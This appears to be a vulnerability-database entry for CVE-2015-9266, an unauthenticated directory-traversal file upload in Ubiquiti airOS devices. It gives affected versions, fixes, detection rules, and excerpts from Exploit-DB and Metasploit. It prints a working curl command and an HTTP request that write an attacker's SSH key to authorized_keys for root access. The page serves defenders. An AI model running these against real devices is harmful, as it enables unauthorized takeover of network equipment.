CVE-2015-9266
published 2018-09-05CVE-2015-9266: The web management interface of Ubiquiti airMAX, airFiber, airGateway and EdgeSwitch XP (formerly TOUGHSwitch) allows an unauthenticated attacker to upload and…
PriorityP186critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
74.00%
99.4th percentile
The web management interface of Ubiquiti airMAX, airFiber, airGateway and EdgeSwitch XP (formerly TOUGHSwitch) allows an unauthenticated attacker to upload and write arbitrary files using directory traversal techniques. An attacker can exploit this vulnerability to gain root privileges. This vulnerability is fixed in the following product versions (fixes released in July 2015, all prior versions are affected): airMAX AC 7.1.3; airMAX M (and airRouter) 5.6.2 XM/XW/TI, 5.5.11 XM/TI, and 5.5.10u2 XW; airGateway 1.1.5; airFiber AF24/AF24HD 2.2.1, AF5x 3.0.2.1, and AF5 2.2.1; airOS 4 XS2/XS5 4.0.4; and EdgeSwitch XP (formerly TOUGHSwitch) 1.3.2.
Affected
12 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ubnt | airos_4_xs2 | < 4.0.4 | 4.0.4 |
| ubnt | airos_4_xs5 | < 4.0.4 | 4.0.4 |
| ubnt | edgeswitch_xp_firmware | < 1.3.2 | 1.3.2 |
| ui | af5_firmware | < 2.2.1 | 2.2.1 |
| ui | af5x_firmware | < 3.0.2.1 | 3.0.2.1 |
| ui | airfiber_af24_firmware | < 2.2.1 | 2.2.1 |
| ui | airfiber_af24hd_firmware | < 2.2.1 | 2.2.1 |
| ui | airgateway_firmware | < 1.15 | 1.15 |
| ui | airmax_ac_firmware | — | — |
| ui | airmax_m_ti_firmware | < 5.6.2 | 5.6.2 |
| ui | airmax_m_xm_firmware | < 5.6.2 | 5.6.2 |
| ui | airmax_m_xw_firmware | < 5.6.2 | 5.6.2 |
Detection & IOCsextracted from sources · hover to see the quote
commandcurl -F "[email protected]/id_rsa.pub;filename=../../etc/dropbear/authorized_keys" -H "Expect:" 'https://192.168.1.20/login.cgi' -k↗
- →Detect unauthenticated multipart POST requests to /login.cgi containing directory traversal sequences (e.g., '../') in the Content-Disposition filename parameter. ↗
- →Alert on HTTP POST requests to /login.cgi with a multipart filename field containing '../../etc/dropbear/authorized_keys' or '../../etc/passwd', indicating directory traversal file upload exploitation. ↗
- →Flag presence of User-Agent 'Jakarta Commons-HttpClient/3.1' in requests to Ubiquiti device management interfaces, as this is the UA used in the documented exploit. ↗
- →Monitor for unexpected modification of /etc/passwd, /etc/dropbear/authorized_keys, or /etc/persistent/rc.poststart on AirOS devices, which are the target files of this exploit and the 'mf' malware. ↗
- →Correlate exploitation with subsequent unauthorized SSH root logins, as the attack chain uploads attacker-controlled public keys to /etc/dropbear/authorized_keys to enable root SSH access. ↗
- ·The exploit endpoint /login.cgi is accessible pre-authentication; no session or credentials are required to trigger the vulnerability, making network-level blocking of the management interface the primary mitigation. ↗
- ·All versions prior to the July 2015 fixes are affected across multiple product lines; patched versions are airMAX AC 7.1.3, airMAX M 5.6.2, airGateway 1.1.5, airFiber AF24/AF24HD 2.2.1, AF5x 3.0.2.1, AF5 2.2.1, airOS 4 XS2/XS5 4.0.4, and EdgeSwitch XP 1.3.2. ↗
- ·The 'mf' malware actively exploits this vulnerability in the wild to persist on devices via /etc/persistent/rc.poststart, indicating active exploitation beyond opportunistic scanning. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
AirOS 6.x - Arbitrary File Upload
exploitdb·2016-04-15
CVE-2015-9266 AirOS 6.x - Arbitrary File Upload
AirOS 6.x - Arbitrary File Upload
---
EDB-Note Source: https://hackerone.com/reports/73480
Vulnerability
It's possible to overwrite any file (and create new ones) on AirMax systems, because the "php2" (maybe because of a patch) don't verify the "filename" value of a POST request. It's possible to a unauthenticated user to exploit this vulnerability.
Example
Consider the following request:
POST https://192.168.1.20/login.cgi HTTP/1.1
Cookie: $Version=0; AIROS_SESSIONID=9192de9ba81691e3e4d869a7207ec80f; $Path=/; ui_language=en_US
Content-Type: multipart/form-data; boundary=---------------------------72971515916103336881230390860
Content-Length: 773
User-Agent: Jakarta Commons-HttpClient/3.1
Host: 192.168.1.20
Cookie: $Version=0; AIROS_SESSIONID=7597f7f30cec75e1faef8fb608fc43bb; $Path=/
Metasploit
Ubiquiti airOS Arbitrary File Upload
metasploit
Ubiquiti airOS Arbitrary File Upload
Ubiquiti airOS Arbitrary File Upload
This module exploits a pre-auth file upload to install a new root user to /etc/passwd and an SSH key to /etc/dropbear/authorized_keys. FYI, /etc/{passwd,dropbear/authorized_keys} will be overwritten. /etc/persistent/rc.poststart will be overwritten if PERSIST_ETC is true. This method is used by the "mf" malware infecting these devices.
No writeups or analysis indexed.
https://community.ubnt.com/t5/airMAX-General-Discussion/Virus-attack-URGENT-UBNT/td-p/1562940https://community.ubnt.com/t5/airMAX-Updates-Blog/Important-Security-Notice-and-airOS-5-6-5-Release/ba-p/1565949https://community.ubnt.com/t5/airMAX-Updates-Blog/Security-Release-for-airMAX-TOUGHSwitch-and-airGateway-Released/ba-p/1300494https://hackerone.com/reports/73480https://www.exploit-db.com/exploits/39701/https://www.exploit-db.com/exploits/39853/https://www.rapid7.com/db/modules/exploit/linux/ssh/ubiquiti_airos_file_uploadhttps://community.ubnt.com/t5/airMAX-General-Discussion/Virus-attack-URGENT-UBNT/td-p/1562940https://community.ubnt.com/t5/airMAX-Updates-Blog/Important-Security-Notice-and-airOS-5-6-5-Release/ba-p/1565949https://community.ubnt.com/t5/airMAX-Updates-Blog/Security-Release-for-airMAX-TOUGHSwitch-and-airGateway-Released/ba-p/1300494https://hackerone.com/reports/73480https://www.exploit-db.com/exploits/39701/https://www.exploit-db.com/exploits/39853/https://www.rapid7.com/db/modules/exploit/linux/ssh/ubiquiti_airos_file_upload
2018-09-05
Published